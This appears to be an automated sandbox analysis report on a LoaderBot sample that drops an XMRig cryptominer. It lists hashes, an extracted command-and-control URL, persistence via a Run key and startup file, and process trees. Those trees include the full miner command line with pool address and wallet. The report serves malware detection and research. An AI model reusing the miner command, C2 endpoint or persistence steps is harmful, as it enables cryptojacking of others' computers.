Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
28-02-2023 17:18
Behavioral task
behavioral1
Sample
920-55-0x0000000000810000-0x0000000001874000-memory.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
920-55-0x0000000000810000-0x0000000001874000-memory.exe
Resource
win10v2004-20230220-en
General
-
Target
920-55-0x0000000000810000-0x0000000001874000-memory.exe
-
Size
16.4MB
-
MD5
c332d2c28f0f12d56f63d9f3e5bd737e
-
SHA1
1cb3c1a4d83abd582561839885317832b80d9701
-
SHA256
656f171546dd818bc4ecbd10397c1993b0485017b5e4e841effc5e663f291827
-
SHA512
27e6c1eb04c7e3f98731f8b4596229a4ffa588592258b4e8764f807302df9df2f44906b1ce2d8c4693f7917ff1d273d2d842745ef4ea542e71da75e3d8b1d80c
-
SSDEEP
393216:euEKRCOqXnU6lzje+CtrDXXTUPSPS4qTZ/wJ+F0a8b96:eu/qXlTZ8bXbE
Malware Config
Extracted
loaderbot
http://92.204.173.86/cmd.php
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/4564-133-0x0000000000B40000-0x0000000001BA4000-memory.dmp loaderbot -
XMRig Miner payload 21 IoCs
resource yara_rule behavioral2/memory/1300-149-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1300-150-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-153-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-156-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-157-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-158-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-161-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-164-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-165-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-166-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4892-167-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/444-172-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/444-173-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/444-175-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/444-177-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/444-180-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1144-186-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1144-187-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1144-188-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1144-191-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1144-194-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation 920-55-0x0000000000810000-0x0000000001874000-memory.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 920-55-0x0000000000810000-0x0000000001874000-memory.exe -
Executes dropped EXE 4 IoCs
pid Process 1300 Driver.exe 4892 Driver.exe 444 Driver.exe 1144 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\920-55-0x0000000000810000-0x0000000001874000-memory.exe" 920-55-0x0000000000810000-0x0000000001874000-memory.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 4140 1300 WerFault.exe 86 4692 4892 WerFault.exe 90 1424 444 WerFault.exe 101 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe Token: SeLockMemoryPrivilege 1300 Driver.exe Token: SeLockMemoryPrivilege 1300 Driver.exe Token: SeLockMemoryPrivilege 4892 Driver.exe Token: SeLockMemoryPrivilege 4892 Driver.exe Token: SeLockMemoryPrivilege 444 Driver.exe Token: SeLockMemoryPrivilege 444 Driver.exe Token: SeLockMemoryPrivilege 1144 Driver.exe Token: SeLockMemoryPrivilege 1144 Driver.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4564 wrote to memory of 1300 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 86 PID 4564 wrote to memory of 1300 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 86 PID 4564 wrote to memory of 4892 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 90 PID 4564 wrote to memory of 4892 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 90 PID 4564 wrote to memory of 444 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 101 PID 4564 wrote to memory of 444 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 101 PID 4564 wrote to memory of 1144 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 105 PID 4564 wrote to memory of 1144 4564 920-55-0x0000000000810000-0x0000000001874000-memory.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\920-55-0x0000000000810000-0x0000000001874000-memory.exe"C:\Users\Admin\AppData\Local\Temp\920-55-0x0000000000810000-0x0000000001874000-memory.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 46JP2Vir9Zd4xARGJRWwA7DrzTyV541xXVAnVuR7KnMcSXidE9roEwKWmSCUF1QMygYkLFvRegGxWhTVVgmnQN7dSoA1X9j -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1300 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1300 -s 7603⤵
- Program crash
PID:4140
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 46JP2Vir9Zd4xARGJRWwA7DrzTyV541xXVAnVuR7KnMcSXidE9roEwKWmSCUF1QMygYkLFvRegGxWhTVVgmnQN7dSoA1X9j -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4892 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4892 -s 5483⤵
- Program crash
PID:4692
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 46JP2Vir9Zd4xARGJRWwA7DrzTyV541xXVAnVuR7KnMcSXidE9roEwKWmSCUF1QMygYkLFvRegGxWhTVVgmnQN7dSoA1X9j -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:444 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 444 -s 5363⤵
- Program crash
PID:1424
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 46JP2Vir9Zd4xARGJRWwA7DrzTyV541xXVAnVuR7KnMcSXidE9roEwKWmSCUF1QMygYkLFvRegGxWhTVVgmnQN7dSoA1X9j -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1300 -ip 13001⤵PID:5108
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 4892 -ip 48921⤵PID:4996
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 492 -p 444 -ip 4441⤵PID:1316
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322